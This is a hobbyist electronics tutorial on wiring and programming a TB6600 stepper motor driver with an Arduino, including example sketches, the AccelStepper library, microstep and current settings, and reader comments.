Arduino library. This example can be used to let the motor spin continuously. In the second example, we will look at how you can control the speed, number of revolutions, and spinning direction of the stepper motor. Finally, we will take a look at the AccelStepper library. This library is fairly easy to use and allows you to add acceleration and deceleration to the movement of the stepper motor. After each example, I break down and explain how the code works, so you should have no problems modifying it to suit your needs. If you have any questions, please leave a comment below. If you would like to learn more about other stepper motor drivers, then the articles below might be useful: - TB6560 Stepper Motor Driver with Arduino Tutorial - How to control a stepper motor with A4988 driver and Arduino - 28BYJ-48 Stepper Motor with ULN2003 Driver and Arduino Tutorial - How to control a Stepper Motor with Arduino Motor Shield Rev3 Supplies Hardware components Tools *Hackaday wrote a great article on the benefits of using wire ferrules (also known as end sleeves). Software Makerguides.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to products on Amazon.com. About the driver The TB6600 microstepping driver is built around the Toshiba TB6600HG IC and it can be used to drive two-phase bipolar stepper motors. With a maximum current of 3.5 A continuous, the TB6600 driver can be used to control quite large stepper motors like a NEMA 23. Make sure that you do not connect stepper motors with a current rating of more than 3.5 A to the driver. The driver has several safety functions built-in like over-current, under-voltage shutdown, and overheating protection. You can find more specifications in the table below. Note that the exact specifications and dimensions can differ slightly between manufacturers. Always take a look at the datasheet of your particular driver, before connecting power. TB6600 Specifications 1 These are the specifications for the TB6600HG IC, the driver itself has a maximum current rating of 3.5 A and 4.0 A peak. 2 See comment on fake/upgraded TB6600 drivers below. For more information, you can check out the datasheet and manual below: Fake or ‘upgraded’ TB6600 drivers I recently took apart one of the TB6600 drivers I ordered and found out that it didn’t actually use a TB6600HG chip. Instead, it used a much smaller TB67S109AFTG chip, also made by Toshiba. The performance and specifications of these chips are similar, but the TB6600HG does have a higher peak current rating (up to 5 A) and it is just a much larger chip with better heatsinking overall. There is a very simple way to check if your driver uses a TB6600HG chip or a TB67S109AFTG chip, the TB6600HG only supports up to 1/16 microstepping (see datasheet), whereas the TB67S109AFTG goes to 1/32. The main reason manufacturers switched over to this other chip is probably price. Below you can find links to the chips on LCSC.com which shows that the TB67S109AFTG is around $1.50 cheaper. TB6600HG: TB67S109AFTG: You can buy genuine TB6600 drivers on Amazon, like this 4-axis driver board but most use the TB67S109AFTG chip. You can tell it uses the TB6600HG chip from the pins sticking out of the PCB and it also only goes up to 1/16 microstepping. Jim from embeddedtronicsblog did some testing on the TB67S109AFTG drivers and found that the stepper motors ran nicer than with the TB6600 drivers. So should you be going for a genuine TB6600 or the ‘upgrade’? I would say it depends on whether you really need the high current output or if you rather prefer up to 1/32 microstepping. You can find the datasheet for the TB67S109AFTG below. Alternatives Note that the TB6600 is an analog driver. In recent years, digital drivers like the DM556 or DM542 have become much more affordable. Digital drivers usually give much better performance and quieter operation. They can be wired and controlled in the same way as the TB6600, so you can easily upgrade your system later. I have used the DM556 drivers for my DIY CNC router and they have been working great for several years. TB6600 vs TB6560 When shopping for a TB6600 stepper motor driver, you will probably come across the slightly cheaper TB6560 driver as well. This driver can be controlled with the same code/wiring, but there are some key differences. *Drivers using TB67S109AFTG chip. So the main differences are the higher maximum voltage, higher maximum current, and up to 1/32 microstepping. The TB6600 also has a better heatsink and a nicer overall form factor. If you want to control larger stepper motors or need a higher resolution, I recommend going with the TB6600. Wiring – Connecting TB6600 to stepper motor and Arduino Connecting the TB6600 stepper motor driver to an Arduino and stepper motor is fairly easy. The wiring diagram below shows you which connections you need to make. In this tutorial, we will be connecting the driver in a common cathode configuration. This means that we connect all the negative sides of the control signal connections to ground. The connections are also given in the table below: TB6600 Connections Note that we have left the enable pins (ENA- and ENA+) disconnected. This means that the enable pin is always LOW and the driver is always enabled. How to determine the correct stepper motor wiring? If you can not find the datasheet of your stepper motor, it can be difficult to figure out which color wire goes where. I use the following trick to determine how to connect 4 wire bipolar stepper motors: The only thing you need to identify is the two pairs of wires which are connected to the two coils of the motor. The wires from one coil get connected to A- and A+ and the other to B- and B+, the polarity doesn’t matter. To find the two wires from one coil, do the following with the motor disconnected: - Try to spin the shaft of the stepper motor by hand and notice how hard it is to turn. - Now pick a random pair of wires from the motor and touch the bare ends together. - Next, while holding the ends together, try to spin the shaft of the stepper motor again. If you feel a lot of resistance, you have found a pair of wires from the same coil. If you can still spin the shaft freely, try another pair of wires. Now connect the two coils to the pins shown in the wiring diagram above. (If it is still unclear, please leave a comment below, more info can also be found on the RepRap.org wiki) TB6600 microstep settings Stepper motors typically have a step size of 1.8° or 200 steps per revolution, this refers to full steps. A microstepping driver such as the TB6600 allows higher resolutions by allowing intermediate step locations. This is achieved by energizing the coils with intermediate current levels. For instance, driving a motor in 1/2 step mode will give the 200-steps-per-revolution motor 400 microsteps per revolution. You can change the TB6600 microstep settings by switching the dip switches on the driver on or off. See the table below for details. Make sure that the driver is not connected to power when you adjust the dip switches! Please note that these settings are for the 1/32 microstepping drivers with the TB67S109AFTG chip. Almost all the TB6600 drivers you can buy nowadays use this chip. Typically you can also find a table with the microstep and current settings on the body of the driver. Microstep table Generally speaking, a smaller microstep setting will result in a smoother and quieter operation. It will however limit the top speed that you can achieve when controlling the stepper motor driver with an Arduino. TB6600 current settings You can adjust the current that goes to the motor when it is running by setting the dip switches S4, S5, and S6 on or off. I recommend starting with a current level of 1 A. If your motor is missing steps or stalling, you can always increase the current level later. Current table Basic TB6600 with Arduino example code With the following sketch, you can test the functionality of the stepper motor driver. It simply lets the motor rotate at a fixed speed. You can upload the code to your Arduino using the Arduino IDE. For this specific example, you do not need to install any libraries. In the next example we will look at controlling the speed, number of revolutions and spinning direction of the stepper motor. You can copy the code by clicking on the button in the top right corner of the code field. /* Example sketch to control a stepper motor with TB6600 stepper motor driver and Arduino without a library: continuous rotation. More info: */ // Define stepper motor connections: #define dirPin 2 #define stepPin 3 void setup() { // Declare pins as output: pinMode(stepPin, OUTPUT); pinMode(dirPin, OUTPUT); // Set the spinning direction CW/CCW: digitalWrite(dirPin, HIGH); } void loop() { // These four lines result in 1 step: digitalWrite(stepPin, HIGH); delayMicroseconds(500); digitalWrite(stepPin, LOW); delayMicroseconds(500); } As you can see, the code is very short and super simple. You don’t need much to get a stepper motor spinning! Code explanation The sketch starts with defining the step (PUL+) and direction (DIR+) pins. I connected them to Arduino pin 3 and 2. The statement #define is used to give a name to a constant value. The compiler will replace any references to this constant with the defined value when the program is compiled. So everywhere you mention dirPin, the compiler will replace it with the value 2 when the program is compiled. // Define stepper motor connections: #define dirPin 2 #define stepPin 3 In the setup() section of the code, all the motor control pins are declared as digital OUTPUT with the function pinMode(pin, mode). I also set the spinning direction of the stepper motor by setting the direction pin HIGH. For this we use the function digitalWrite(pin, value). void setup() { // Declare pins as output: pinMode(stepPin, OUTPUT); pinMode(dirPin, OUTPUT); // Set the spinning direction CW/CCW: digitalWrite(dirPin, HIGH); } In the loop() section of the code, we let the driver execute one step by sending a pulse to the step pin. Since the code in the loop section is repeated continuously, the stepper motor will start to rotate at a fixed speed. In the next example, you will see how you can change the speed of the motor. void loop() { // These four lines result in 1 step: digitalWrite(stepPin, HIGH); delayMicroseconds(500); digitalWrite(stepPin, LOW); delayMicroseconds(500); } 2. Example code to control rotation, speed and direction This sketch controls both the speed, the number of revolutions and the spinning direction of the stepper motor. /* Example sketch to control a stepper motor with TB6600 stepper motor driver and Arduino without a library: number of revolutions, speed and direction. More info: */ // Define stepper motor connections and steps per revolution: #define dirPin 2 #define stepPin 3 #define stepsPerRevolution 1600 void setup() { // Declare pins as output: pinMode(stepPin, OUTPUT); pinMode(dirPin, OUTPUT); } void loop() { //); } delay(1000); // Set the spinning direction counterclockwise: digitalWrite(dirPin, LOW); // Spin the stepper motor 1 revolution quickly: for (int i = 0; i < stepsPerRevolution; i++) { // These four lines result in 1 step: digitalWrite(stepPin, HIGH); delayMicroseconds(1000); digitalWrite(stepPin, LOW); delayMicroseconds(1000); } delay(1000); // Set the spinning direction clockwise: digitalWrite(dirPin, HIGH); // Spin the stepper motor 5 revolutions fast: for (int i = 0; i < 5 * stepsPerRevolution; i++) { // These four lines result in 1 step: digitalWrite(stepPin, HIGH); delayMicroseconds(500); digitalWrite(stepPin, LOW); delayMicroseconds(500); } delay(1000); // Set the spinning direction counterclockwise: digitalWrite(dirPin, LOW); // Spin the stepper motor 5 revolutions fast: for (int i = 0; i < 5 * stepsPerRevolution; i++) { // These four lines result in 1 step: digitalWrite(stepPin, HIGH); delayMicroseconds(500); digitalWrite(stepPin, LOW); delayMicroseconds(500); } delay(1000); } How the code works: Besides setting the stepper motor connections, I also defined a stepsPerRevolution constant. Because I set the driver to 1/8 microstepping mode I set it to 1600 steps per revolution (for a standard 200 steps per revolution stepper motor). Change this value if your setup is different. // Define stepper motor connections and steps per revolution: #define dirPin 2 #define stepPin 3 #define stepsPerRevolution 1600 The setup() section is the same as before, only we don’t need to define the spinning direction just yet. In the loop() section of the code, we let the motor spin one revolution slowly in the CW direction and one revolution quickly in the CCW direction. Next, we let the motor spin 5 revolutions in each direction with a high speed. So how do you control the speed, spinning direction and number of revolutions? //); } Control spinning direction: To control the spinning direction of the stepper motor we set the DIR (direction) pin either HIGH or LOW. For this we use the function digitalWrite(). Depending on how you connected the stepper motor, setting the DIR pin high will let the motor turn CW or CCW. Control number of steps or revolutions: In this example sketch, the for loops control the number of steps the stepper motor will take. The code within the for loop results in 1 (micro)step of the stepper motor. Because the code in the loop is executed 1600 times (stepsPerRevolution), this results in 1 revolution. In the last two loops, the code within the for loop is executed 8000 times, which results in 8000 (micro)steps or 5 revolutions. Note that you can change the second term in the for loop to whatever number of steps you want. for(int i = 0; i < 800; i++) would result in 800 steps or half a revolution. Control speed: The speed of the stepper motor is determined by the frequency of the pulses we send to the STEP pin. The higher the frequency, the faster the motor runs. You can control the frequency of the pulses by changing delayMicroseconds() in the code. The shorter the delay, the higher the frequency, the faster the motor runs. Installing the AccelStepper library The AccelStepper library written by Mike McCauley is an awesome library to use for your project. One of the advantages is that it supports acceleration and deceleration, but it has a lot of other nice functions too. You can download the latest version of this library here or click the button below. You can install the library by going to Sketch > Include Library > Add .ZIP Library… in the Arduino IDE. Another option is to navigate to Tools > Manage Libraries… or type Ctrl + Shift + I on Windows. The Library Manager will open and update the list of installed libraries. You can search for ‘accelstepper’ and look for the library by Mike McCauley. Select the latest version and then click Install. 3. AccelStepper example code With the following sketch, you can add acceleration and deceleration to the movements of the stepper motor, without any complicated coding. In the following example, the motor will run back and forth with a speed of 1000 steps per second and an acceleration of 500 steps per second squared. Note that I am still using the driver in 1/8 microstepping mode. If you are using a different setting, play around with the speed and acceleration settings. /* Example sketch to control a stepper motor with TB6600 stepper motor driver, AccelStepper library and Arduino: acceleration and deceleration. More info: */ // Include the AccelStepper library: #include <AccelStepper.h> // Define stepper motor connections and motor interface type. Motor interface type must be set to 1 when using a driver: #define dirPin 2 #define stepPin 3 #define motorInterfaceType 1 // Create a new instance of the AccelStepper class: AccelStepper stepper = AccelStepper(motorInterfaceType, stepPin, dirPin); void setup() { // Set the maximum speed and acceleration: stepper.setMaxSpeed(1000); stepper.setAcceleration(500); } void loop() { // Set the target position: stepper.moveTo(8000); // Run to target position with set speed and acceleration/deceleration: stepper.runToPosition(); delay(1000); // Move back to zero: stepper.moveTo(0); stepper.runToPosition(); delay(1000); } Code explanation: The first step is to include the library with #include <AccelStepper.h>. // Include the AccelStepper library: #include <AccelStepper.h> The next step is to define the TB6600 to Arduino connections and the motor interface type. The motorinterface type must be set to 1 when using a step and direction driver. You can find the other interface types here. // Define stepper motor connections and motor interface type. Motor interface type must be set to 1 when using a driver: #define dirPin 2 #define stepPin 3 #define motorInterfaceType 1 Next, you need to create a new instance of the AccelStepper class with the appropriate motor interface type and connections. In this case, I called the stepper motor ‘stepper’ but you can use other names as well, like ‘z_motor’ or ‘liftmotor’ etc. AccelStepper liftmotor = AccelStepper(motorInterfaceType, stepPin, dirPin);. The name that you give to the stepper motor will be used later to set the speed, position, and acceleration for that particular motor. You can create multiple instances of the AccelStepper class with different names and pins. This allows you to easily control 2 or more stepper motors at the same time. // Create a new instance of the AccelStepper class: AccelStepper stepper = AccelStepper(motorInterfaceType, stepPin, dirPin); In the setup(), besides the maximum speed, we need to define the acceleration/deceleration. For this we use the function setMaxSpeed() and setAcceleration(). void setup() { // Set the maximum speed and acceleration: stepper.setMaxSpeed(1000); stepper.setAcceleration(500); } In the loop section of the code, we let the motor rotate a predefined number of steps. The function stepper.moveTo() is used to set the target position (in steps). The function stepper.runToPostion() moves the motor (with acceleration/deceleration) to the target position and blocks until it is at the target position. Because this function is blocking, you shouldn’t use this when you need to control other things at the same time. // Set the target position: stepper.moveTo(8000); // Run to target position with set speed and acceleration/deceleration: stepper.runToPosition(); If you would like to see more examples for the AccelStepper libary, check out my tutorial for the A4988 stepper motor driver: Conclusion In this article, I have shown you how to control a stepper motor with the TB6600 stepper motor driver and Arduino. I hope you found it useful and informative. If you did, please share it with a friend who also likes electronics and making things! I would love to know what projects you plan on building (or have already built) with this driver.. Vicen Monday 21st of June 2021 ¡Genial! He seguido tu tutorial y todo funciona como es de esperar. Tengo aparcado un CNC que he construido debido a problemas de adaptación con los motores paso a paso hasta ahora. Creo que después de este artículo he logrado disipar los problemas que estaba arrastrando con mi CNC, estoy convencido que era una cuestión de controlar los pasos y la corriente de cada motor. Por lo tanto, sólo me queda darte las gracias por tu trabajo y tu correcto trato del tema. Repito GRACIAS. Dattatray Thatte Saturday 8th of May 2021 Hello! This is the first time that I used an Arduino controller and I'm extremely amazed about its user friendliness. I'm also not much familiar with stepper motors and using one independently for the first time. I used the sample programs to run a Nema 23, 20kg-cm motor using Arduino UNO controller and TB6600 driver. Our application requires continuous fwd/rev rotation with minimum acceleration and speed ranging from 400rpm to 600 rpm. I need guidance regarding the following points: 1. How can I calculate the exact rpm of motor? 2. How do I know what exactly happens in the AccelStepper libraries? 3. How shall I set the max speed and Acceleration values in the program to get the speed in the above range? Thank you! DVT Jamie Baxter Friday 16th of April 2021 Hi, I’ve followed this exactly with two separate TB6600s and absolutely nothing is happening at all. When I check with a multimeter the pulse and direction pins are showing voltage as expected and the VCC is showing the 12v supplied, but nothing is going to the coils. I’ve followed your tutorial exactly. What could be going wrong? John Doe Monday 18th of January 2021 Phenomenal, Great work, much appreciated, very well explained Robert Born Saturday 16th of January 2021 Very nice explaination! I have a simple question .. I want to control multiple (actually 4) 23-frame steppers same speed/direction for a conveyor application. I want these to be synchronized exactly as possible for smooth operation. Can the four tb4400 drivers be daisy chained to the same Arduino GPIO pins? Is there a limit to how many times (number of drivers) I can do this? I'm wondering about current draw from the 5volt Arduino GPIO spread out over many drivers. Thanks for your help! Bob Robert Born Saturday 16th of January 2021 Oops I meant tb6600
https://www.makerguides.com/tb6600-stepper-motor-driver-arduino-tutorial/
CC-MAIN-2022-21
refinedweb
3,550
53.61
7237/there-hadoop-nodes-nodes-namenodes-multiple-volumes-disks Datanodes can store blocks in multiple directories typically allocated on different local disk drives. In order to setup multiple directories, one needs to specifiy a comma-separated list of pathnames as values under config parameters dfs.data.dir/dfs.datanode.data.dir. Datanodes will attempt to place equal amount of data in each of directories. Namenode also supports multiple directories, which in the case store the name space image and edit logs. In order to setup multiple directories one needs to specify a comma-separated list of pathnames as values under config parameters dfs.name.dir/dfs.namenode.data.dir . The namenode directories ae used for the namespace data replication so that image and log could be restored from the remaining disks/volumes if one of the disks fails. Hope it will answer your query to some extent. The distributed copy command, distcp, is a ...READ MORE You can add some more memory by ...READ MORE You can easily set the number of ...READ MORE use jps command, It will show all the running ...READ MORE In your case there is no difference ...READ MORE Firstly you need to understand the concept ...READ MORE Well, hadoop is actually a framework that ...READ MORE Hi, You can create one directory in HDFS ...READ MORE First of all, COBOL is a programming ...READ MORE The generic command i.e used to import ...READ MORE OR At least 1 upper-case and 1 lower-case letter Minimum 8 characters and Maximum 50 characters Already have an account? Sign in.
https://www.edureka.co/community/7237/there-hadoop-nodes-nodes-namenodes-multiple-volumes-disks?show=7238
CC-MAIN-2022-33
refinedweb
265
58.69
Opened 7 years ago Last modified 2 years ago #23718 assigned Bug TEST_MIRROR setting doesn't work as expected (and has no tests) Description TEST_MIRROR promises "connection to slave will be redirected to point at default. As a result, writes to default will appear on slave" I've set up a minimum django project (using postgres backed) to demonstrate behavior. def test_fixture(self): MyModel.objects.using('default').create(name=1) MyModel.objects.using('slave').create(name=2) MyModel.objects.using('slave').create(name=3) self.assertEqual(list(map(repr, MyModel.objects.using('default').all())), list(map(repr, MyModel.objects.using('slave').all()))) Both lists should be equal, because replica queries should be hitting default instead. It appears not to be the case for Django>=1.4 up to latest 1.7.1 (but actually passes against 1.3.7) AssertionError: Lists differ: ['<MyModel: 1>', '<MyModel: 2>... != ['<MyModel: 2>', '<MyModel: 3>... First differing element 0: <MyModel: 1> <MyModel: 2> First list contains 1 additional elements. First extra element 2: <MyModel: 3> - ['<MyModel: 1>', '<MyModel: 2>', '<MyModel: 3>'] ? ^ ---------------- + ['<MyModel: 2>', '<MyModel: 3>'] ? ^ Here is a project I used to test: Change History (27) comment:1 Changed 7 years ago by comment:2 Changed 7 years ago by I've run git bisect, and first commit with regression happened to be: 905e33f84a1a10e4f0183d879c52076ef876fc3b, which is related to #16885 Here is a log of my bisect: comment:3 Changed 7 years ago by I haven't verified the issue, but I noticed there are no tests for TEST['MIRROR'] (renamed on master) so we should at least add some. Also the test in the "regression commit" seems to be gone -- not sure if its removal was intentional or not. comment:6 Changed 7 years ago by The behavior in the bug description is sort-of expected, because of transactions ( default and slave are the same database -- in the test project, they are defined this way even regardless of TEST_MIRROR -- but accessed through different connections, and so, separate transactions). I'm saying sort-of expected because it seems the test is running in a transaction on default but not on slave, which is a little surprising -- but not the problem claimed. I don't think we want to force test-cases to run each test in transactions on all databases -- I'm not sure that even makes sense; but we should probably document that tests using more than one database should be TransactionTestCases. comment:7 Changed 6 years ago by Is it possible to have the mirrors share a connection? Using TransactionTestCase has the additional disadvantage of preventing multiprocessed test runs, which works fine when each test runs in a transaction. comment:8 Changed 6 years ago by I just ran into this as well. Based on the documentation, I expected to set DATABASES = { 'default': { ... }, 'replica': { ... 'TEST_MIRROR': 'default', # 'TEST': {'MIRROR': 'default'}, # I tried this too. } } and have my tests read from replica and write to default, which should be the same database and act as if I had just one database defined as default. comment:9 Changed 6 years ago by I just rediscovered that test mirrors require TransactionTestCase. I'm wondering if it would be possible to share the database connection instead of having two connections with the same parameters. If that doesn't work, we can document this limitation instead. comment:10 Changed 6 years ago by Just ran into this, but with raw queries instead. Using the connection directly does not work even with TransactionTestCase. So for now I'm using this hacky workaround: from django.db import connections class ReplicationTestCase(TestCase): """ Redirect raw queries to the replica, ie. from django.db import connections cursor = connections['replica'].cursor() cursor.execute(...) # Is run directly on master in tests """ def setUp(self): super(ReplicationTestCase, self).setUp() connections['replica']._orig_cursor = connections['replica'].cursor connections['replica'].cursor = connections['master'].cursor def tearDown(self): connections['replica'].cursor = connections['replica']._orig_cursor super(ReplicationTestCase, self).tearDown() As an added benefit it works for model managers too even though I'm not using TransactionTestCase indicating that the connection might be able to be shared in a similar way? comment:11 Changed 4 years ago by Is this ever going to be fixed? Setting the mirror should just copy the cursor so no matter where the slave DB is called it redirects to the master. comment:12 Changed 4 years ago by It will be fixed when someone submits a patch and another person reviews it. comment:13 Changed 4 years ago by I have created a small patch, the PR is here The solution I went for is that when the MIRROR is specified then the mirror uses the same connection as the mirrored one. If the tests look a bit redundant please let me know. comment:14 Changed 4 years ago by comment:15 Changed 3 years ago by comment:16 Changed 3 years ago by comment:17 Changed 3 years ago by comment:18 Changed 3 years ago by comment:19 Changed 3 years ago by Question from PR: The PR currently uses mocks in the tests, but it's much simpler (for the current test and presumably into the future) and much clearer to just declare an extra replica alias with the TEST["MIRROR"] setting. This second approach would require adjustments to test settings for Jenkins, the Django-Box VM and all devs' settings running against other DBs. So the question is can we make that change? comment:20 Changed 3 years ago by comment:21 Changed 3 years ago by comment:22 Changed 2 years ago by Planning to work on this since affecting our use of testing using TEST_MIRROR and TestCase. I think the right approach here is to have mirror connections swapped to the connection object they mirror but only when using TestCase to allow proper transaction testing to take place. That's something the previous patch wasn't doing appropriately. comment:23 Changed 2 years ago by My team at work also noticed an issue here which happens when you have a default + read_replica config, and you have a router that only selects a read_replica when considering particular models. If you have those conditions, and a data migration that uses both Job and User, you will have issues because the "default" connection config will be pointing to your test_myschema, whereas the read_replica config will still be pointing to myschema. e.g., models.py: Job: user_id := FK(User) DBRouter: db_for_write := 'read_replica' if model == Job else 'default' settings: DATABASES = { 'default': { ... }, 'read_replica': { # <configs>... 'TEST': {'MIRROR': 'default'} } } 0001_migration.py: # ... for job in Job.objects.all(): # using apps.get_model() job.user.id # will error out with __fake__.DoesNotExist In the case above, if your "live" read_replica schema has any job data, it will try to run that last line, but there won't be any Users in the test_schema to match to. Not sure if we're doing something wrong, but just letting you know that there are cases where a custom DBrouter could route to a config that should be a test mirror, but isn't. Using python 3.6, Django 1.11.20, MySQL 5.7 comment:24 Changed 2 years ago by @Simon Charette If you haven't started working on this, I would like to give this a try. comment:25 Changed 2 years ago by @Rag Sagar.V, sure feel free to assign the ticket to yourself. I'd start by having a look at the previous PR and make sure to understand the rationale behind why it got rejected. For what it's worth I gave this ticket a 2-3 hours try by trying to point connections['mirror'] at connections['mirrored'] Python objects for the duration of TestCase and I got some failures related to transaction handling. I think Tim did a good job at nailing the issues with this approach. In short transaction handing is alias based so if something goes wrong with connections['mirrored'] then it's also surfaced in connections['mirror'] which differs from what would happen in a real life scenario. The further I got from getting things working were by setting the isolation level on the miror/replica to READ UNCOMMITED for the duration of the test to allow it to see changes within the testcase transaction. This isolation level is not supported on all backends though (e.g. PostgreSQL) and was quite unreliable on MySQL from my minimal testing. That one might be hard one if you're not familiar with how TestCase transactions wrapping takes place but you'll definitely learn a lot by giving this ticket a shot and seeing how the suite fails. Happy to review your changes if you get stuck on Github. comment:26 Changed 2 years ago by comment:27 Changed 2 years ago by @Simon Charette Since READ_UNCOMMITED is not supported in postgres, Should I explore further in that direction? The solution that comes up on my mind is pointing mirror connections to mirrored for the duration of the TestCase. But that has the issues you pointed out. So I am bit confused which way I should go. comment:28 Changed 2 years ago by Rag Sagar, I'm afraid none of the above solution will work appropriately. Here's the problem: If you configure mirrors to create a new connection to mirrored connection settings then changes performed within a transaction using the mirrored connection won't be visible in the mirror connection per READ COMMITED transaction isolation definition. That's the case right now. Using READ UNCOMMITTED on the mirror connection seems to be a no-go from limited support and the fact MySQL seems inconsistent and reusing the same connection has confuses transaction management. The only solutions I see going forward are: - Document this caveats of TEST_MIRRORand TestCasetransaction wrapping interactions. - Invest more time trying to get the connectionsrepointing during TestCase.setUpClassworking to get the suite passing and document the new caveats. In both cases we could at least do 1. or warn about it to make it clear this is not currently supported. It would be quite helpful if you could convert your test to one for Django's test suite and then bisect to determine the commit in Django that introduced the regression.
https://code.djangoproject.com/ticket/23718
CC-MAIN-2021-31
refinedweb
1,707
52.8
You are not logged in. Pages: 1 Tell me the synchronization problem in the programme below and tell me how to modify the code accordingly so it will run properly. This programme is created for JDK 1.5 and tell me how to make it run with 1.4 . Please Reply as fast as you can. Thanks public class Bank{ public static Integer acc=new Integer(10000); public static void main(String args[]){ Customer cust1 = new Customer(acc,true); Customer cust2 = new Customer(acc,false); cust1.start(); cust2.start(); System.out.println("The account balance is" + acc ); while(true); } } public class Customer extends Thread{ private Integer acc; private boolean add; public Customer(Integer acc,boolean add){ this.acc = acc; this.add=add; } public void run(){ if(add) acc +=10000; else acc -=10000; System.out.println("The balance is**" + acc); } } Pages: 1
http://developerweb.net/viewtopic.php?pid=18157
CC-MAIN-2018-43
refinedweb
141
59.6
A hash table is conceptually a contiguous section of memory with a number of addressable elements, commonly called bins, in which data can be quickly inserted, deleted and found. Hash tables represent a sacrifice of memory for the sake of speed - they are certainly not the most memory efficient means of storing data, but they provide very fast lookup times. Hash tables are a common means of organising data, so the designers of the Java programming language have provided a number of classes for easily creating and manipulating instances of hash tables. Hashtable is the class which provides hash tables in Java. Hashtable inherits directly from Dictionary and implements the Map, Cloneable and Serializable interfaces. The implementation of the Map interface is new with Java 1.2. You can view the documentation on Hashtable here. A key is a value that can be mapped to one of the addressable elements of the hash table. The Java programming language provides an interface for generating keys for a number of the core classes: as an example, the snippet below prints out the key representation of a string for later use in a hash table. String abc = new String("abc"); System.out.println("Key for \"abc\" is "+ abc.hashCode()); A hashing function is a function that performs some operation on a set of data such that a key is generated from that data with the key being used as the means of identifying which memory element of the hash table to place the data in. There are a number of properties that it is desirable for a hashing function to possess in order that the hash table be effectively used: The load factor of a hash table is defined as the ratio of the number of filled bins to the total number of bins available. A bin is full when it points to or contains a data element. The load factor is a useful parameter to use in estimating the likelihood of a collision occurring. The Java programming language will allocate more memory to an existing hash table if the load factor exceeds 75%. The user can also choose to set the initial capacity of the hash table with the aim of reducing the number of rehashing methods required. The code snippet below demonstrate how this can be achieved. int initialCapacity = 1000; float loadFactor = 0.80; Hashtable ht = new Hashtable(initialCapacity, loadFactor);If you want to allocate more space for your hash table before the load factor reaches the specified value then use the rehash() method like this: ht.rehash(); A collision occurs when two pieces of data are denoted with the same key by the hashing function. Since the point of using a hash table is to maximise the efficiency with which data is inserted, deleted or found, collisions are to be avoided as much as possible. If you know the hashing function used to create a key then it can be very easy to create collisions. For example, the Java code illustrates how two different strings can have the same hashcode. (text version) import Java.util.*; import Java.lang.*; // x + 31x = x(31 + 1) = x + 31 + 31(x-1) public class Identical { public static void main(String[] args) { String s1 = new String("BB"); String s2 = new String("Aa"); System.out.println(s1.hashCode()); System.out.println(s2.hashCode()); } }This code generates the following output on my RedHat 6.2 box using the kaffe compiler. [bash]$ javac Identical.java [bash]$ java Identical 2112 2112 [bash]$ Chaining is a method of dealing with collisions in a hash table by imagining that each bin is a pointer to a linked list of data elements. When a collision occurs, the new data element is simply inserted into this linked list in some manner. Similarly, when attempting to remove an element from a bin with more than one entry, the list is followed until the element matching the one to be deleted is found.Actually, there is no need for collisions to be dealt with by solely using a linked list - a data structure such as a binary tree could also be used. The Hashtable class in the Java foundation classes uses this method to insert elements into a hash table. Interestingly, using chaining means that a hashtable can have a load factor that exceeds 100%. Open addressing occurs when all of the elements in a hash table are stored in the table itself - no pointers to linked lists: each bin holds one piece of data. This is the simplest means of implementing a hash table, since the table reduces to being an array where the elements can be inserted or deleted from any index position at any time. Linear probing is a means of implementing open addressing by choosing the next free bin to insert a data element into if a collision occurs while trying to insert data. Each of the subsequent bins is checked for a collision before the data is inserted. The String class contains a method hashCode() which is used to generate a key which can used as the key for a hash table. The hashcode for a String object is computed as s[0]*31^(n-1)+s[1]*31^(n-2)+...+s[n-1] using integer arithmetic and where s[i] is the ith character of a string of length n. The hash value of an empty string is defined as zero. I've included a small sample program called CloseWords which finds words in the system dictionary which are ``close'' to the command line argument. To do this the program explicitly exploits one of the traits of the class String's hashing function which is that the hashcode generated tends to cluster together words which are of similar alphanumeric composition. This is actually an undesirable trait, since if the input data is comprised of a limited set of characters then there will tend to be a large number of collisions. The ideal hashing function would distribute the data randomly over the hash table, with trends in the data not leading to an all over tendency to cluster. Another limitation of the hashCode method is that by making the key of type integer the designers of Java unnaturally limited the possible magnitude of the key to just 2^32 -1 meaning that the probability of a collision occurring is much larger than if the key was represented by a 64 bit data type. The Hashtable class and methods supplied in the Java Foundation Classes are a powerful tool for data manipulation - particularly when rapid data retrieval, searching or deleting are required. For large data sets, however, the implementation of the hashing functions in Java will cause a tendency for clustering - which will unnecessarily slow down execution. A better implementation of a hash table would involve a hashing function which distributed data more randomly and a longer data type used for the key. For a more complete discussion of the limitations of hash tables in Java and a better implementation see. Java is a superbly documented language - check it out at SUN. For information on the open source Kaffe compiler visit the website. import java.lang.*; import java.util.*; import java.io.*; /** CloseWords: Exploit the clustering tendency of the native hashCode() method * in the String class to find words that are "close" to the argument. */ public class CloseWords { Hashtable ht; String currString; /** In the code below we create an instance of the Hashtable class in which to store * our hash of all of the words in the system dictionary (yes, this is a very memory * inefficient way of indexing the words). * * @param args */ public static void main(String[] args) { ht = new Hashtable(); try { DataInputStream in = new DataInputStream( new BufferedInputStream( new FileInputStream("/usr/dict/words"))); while((currString = in.readLine())!=null) ht.put(new Integer(currString.hashCode()), currString); int i = args[0].hashCode(); int found=0; while(found < 5) { i--; if(ht.get(new Integer(i))!=null) { System.out.println(ht.get(new Integer(i))); found++; } } i = args[0].hashCode(); found=0; while(found < 5) { i++; if(ht.get(new Integer(i))!=null) { System.out.println(ht.get(new Integer(i))); found++; } } } catch(IOException ioe) { System.out.println("IO Exception"); } } }
http://www.tldp.org/LDP/LGNET/issue57/tindale.html
CC-MAIN-2016-26
refinedweb
1,367
50.67
From: "Guido van Rossum" <guido@python.org> > > > These "use cases" > > > don't convince me that there's a legitimate use case for > > > string.letters etc. that the methods don't cover. > > > > This is funny. In the C++ community there's a nearly unanimous > > consensus that way too much of the functionality of the standard > > strings is expressed as member functions. > > Interesting. Python used to have the same attitude, hence the string > module -- but the existence of multiple string types made methods more > attractive. > > What's the alternative proposed for C++? Free functions at namespace scope. The analogy would be module-level functions in Python. C++ also has multiple string types, but the availability of overloading makes this approach practical (is it time for Python multimethods yet?) If I were to make arguments against string member functions in Python I'd be talking about the degree of coupling between algorithms and data structures, how it interferes with genericity, and the difficulty that users will have in making "string-like" types... but-i-would-never-make-such-silly-arguments-ly y'rs, dave
https://mail.python.org/pipermail/python-dev/2002-May/024666.html
CC-MAIN-2019-22
refinedweb
181
57.87
